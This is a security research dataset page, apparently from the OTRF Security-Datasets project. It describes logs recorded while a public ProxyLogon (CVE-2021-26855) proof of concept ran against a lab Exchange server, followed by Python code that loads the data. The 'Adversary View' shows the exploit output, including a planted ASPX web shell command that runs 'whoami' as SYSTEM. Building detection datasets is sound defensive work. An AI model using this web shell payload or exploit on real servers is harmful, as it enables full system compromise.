Exchange ProxyLogon SSRF RCE Vuln POC
Contents
Exchange ProxyLogon SSRF RCE Vuln POC#
Metadata#
Contributors |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2021/03/14 |
Modification Date |
2021/03/14 |
Tactics |
|
Techniques |
|
Tags |
None |
Dataset Description#
This dataset represents the execution of a public POC to abuse Exchange vulnerabilities (CVE-2021-26855 server-side request forgery (SSRF) vulnerability)
Datasets Downloads#
Type |
Link |
|---|---|
Host |
Adversary View#
C:\Users\wardog.MXS01\Documents>
C:\Users\wardog.MXS01\Documents>python public-poc.py localhost wardog@azsentinel.local
Attacking target localhost
=============================
Got DN: /o=azsentinel/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=6beef80bd6d14a68b9ae39df7f27a8cc-wardog
Got SID: S-1-5-21-594047938-393122191-2580508586-500
Got session id: e243cd06-1093-40d4-829c-63f3b9caea9b
Got canary: pYoEXlKOqkGQMt3Dv3qJUExebVlG6NgI3c_XeQNd-VRV8lo6E5zskoLPJB0uOOGITLTC08eVUkk.
Got OAB id: becafe73-b0c1-4f36-8df4-85f682840ef4
Ready!
Testing command:
===============
POST shell:https://localhost/owa/auth/ohyeah.aspx
code":"Response.Write(new ActiveXObject("WScript.Shell").exec("cmd /c whoami").StdOut.ReadAll());
[*] Waiting for ohyeah.aspx to be available..
[*] Waiting for ohyeah.aspx to be available..
Results:
========
nt authority\system
C:\Users\wardog.MXS01\Documents>
Explore Datasets#
Download & Decompress Dataset#
import requests
from zipfile import ZipFile
from io import BytesIO
url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/proxylogon_ssrf_rce_poc.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
Read JSON File#
from pandas.io import json
df = json.read_json(path_or_buf=datasetJSONPath, lines=True)
Access Security Events#
df.groupby(['Channel']).size().sort_values(ascending=False)